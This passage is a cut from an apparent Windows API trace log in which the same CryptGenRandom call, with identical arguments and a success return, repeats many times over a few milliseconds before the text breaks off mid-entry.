[0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.064] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.065] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.066] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: 